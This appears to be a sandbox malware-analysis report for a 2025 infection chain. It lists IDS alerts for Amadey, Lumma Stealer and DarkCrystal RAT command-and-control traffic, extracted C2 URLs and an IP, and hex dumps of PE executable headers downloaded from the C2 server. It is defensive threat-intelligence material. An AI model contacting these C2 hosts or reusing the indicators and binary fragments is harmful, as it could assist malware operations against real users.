Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49726
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49764
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49790
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49763
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49743
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49776
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49744
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49794
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49760
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49778
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49774
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49816
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49748
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49757
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49766
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49782
Source: Network traffic Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 176.113.115.7:80 -> 192.168.2.5:49797
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49791
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49765
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49755
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49820
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49777
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49825
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49827
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49823
Source: Network traffic Suricata IDS: 2061135 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (oreheatq .live) : 192.168.2.5:53907 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49756
Source: Network traffic Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49834 -> 172.67.172.183:443
Source: Network traffic Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49839 -> 172.67.172.183:443
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49796
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49829
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49736
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49811
Source: Network traffic Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49845 -> 172.67.172.183:443
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49831
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49753
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49835
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49818
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49842
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49838
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49856
Source: Network traffic Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49858 -> 172.67.172.183:443
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49738
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49851
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49833
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49832
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49789
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49772
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49844
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49836
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49740
Source: Network traffic Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49862 -> 172.67.172.183:443
Source: Network traffic Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49849 -> 172.67.172.183:443
Source: Network traffic Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49869 -> 172.67.172.183:443
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49857
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49872
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49892
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49785
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49761
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49848
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49885
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49867
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49878
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49870
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49887
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49864
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49861
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49884
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49781
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49877
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49853
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49874
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49875
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49868
Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49876 -> 5.252.155.176:80
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49859
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49882
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49890
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49880
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49888
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49895
Source: Malware configuration extractor URLs: galarona.bet/GKAns
Source: Malware configuration extractor URLs: oreheatq.live/gsopp
Source: Malware configuration extractor URLs: castmaxw.run/ganzde
Source: Malware configuration extractor URLs: weldorae.digital/geds
Source: Malware configuration extractor URLs: steelixr.live/aguiz
Source: Malware configuration extractor URLs: advennture.top/GKsiio
Source: Malware configuration extractor URLs: targett.top/dsANGt
Source: Malware configuration extractor URLs: smeltingt.run/giiaus
Source: Malware configuration extractor URLs: ferromny.digital/gwpd
Source: Malware configuration extractor IPs: 185.215.113.16
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:55:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 15:06:50 GMTETag: "1dd000-631686b83b21b"Accept-Ranges: bytesContent-Length: 1953792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 90 4d 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4d 00 00 04 00 00 c6 f9 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 7b 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7b 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 
00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 64 6e 69 78 62 6d 74 00 c0 1a 00 00 c0 32 00 00 bc 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 74 79 78 76 67 61 61 00 10 00 00 00 80 4d 00 00 04 00 00 00 aa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4d 00 00 22 00 00 00 ae 1d 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)/,(,/,),,(,-,-g,Y%,Y,Y.,Rich,PEL#gM@M@Wk
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 26 Mar 2025 23:33:49 GMTETag: "51e6d-6314744ebb140"Accept-Ranges: bytesContent-Length: 335469Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d be 52 69 63 68 3c 3e 0d be 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 8d bf 20 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1e 00 1c 03 00 00 2e 01 00 00 00 00 00 30 f5 01 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 06 00 00 04 00 00 00 00 00 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 d0 03 00 34 00 00 00 a4 d0 03 00 50 00 00 00 00 40 06 00 cc 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 3c 23 00 00 1c b1 03 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 55 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 03 00 78 02 00 00 ec c5 03 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 1b 03 00 00 10 00 00 00 1c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 
00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 cc 46 00 00 00 40 06 00 00 48 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 90 06 00 00 24 00 00 00 2a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>Rich<>PEL b.00@@
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 09:12:13 GMTETag: "58800-63163774f5cc4"Accept-Ranges: bytesContent-Length: 362496Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 e2 54 e1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 b2 00 00 00 00 00 00 20 b1 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8b 0b 05 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 d0 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0c 05 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5c d0 04 00 00 10 00 00 00 d2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 37 20 00 00 00 f0 04 00 00 22 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 04 d6 00 00 00 20 05 00 00 54 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d0 3a 00 00 00 00 06 00 00 3c 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELTg @@@:.text\
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 10:35:28 GMTETag: "3e1134-63164a10a017f"Accept-Ranges: bytesContent-Length: 4067636Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d be 52 69 63 68 3c 3e 0d be 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 8d bf 20 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1e 00 1c 03 00 00 fe 03 00 00 00 00 00 30 f5 01 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 07 00 00 04 00 00 00 00 00 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 d0 03 00 34 00 00 00 a4 d0 03 00 50 00 00 00 00 40 06 00 f8 df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 07 00 3c 23 00 00 1c b1 03 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 55 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 03 00 78 02 00 00 ec c5 03 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 1b 03 00 00 10 00 00 00 1c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 
ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>Rich<>PEL b00@P@p
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 11:56:49 GMTETag: "1d0e00-63165c3f5d75a"Accept-Ranges: bytesContent-Length: 1904128Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 e2 54 e1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 b2 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 54 01 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 d8 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 00 06 00 00 00 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 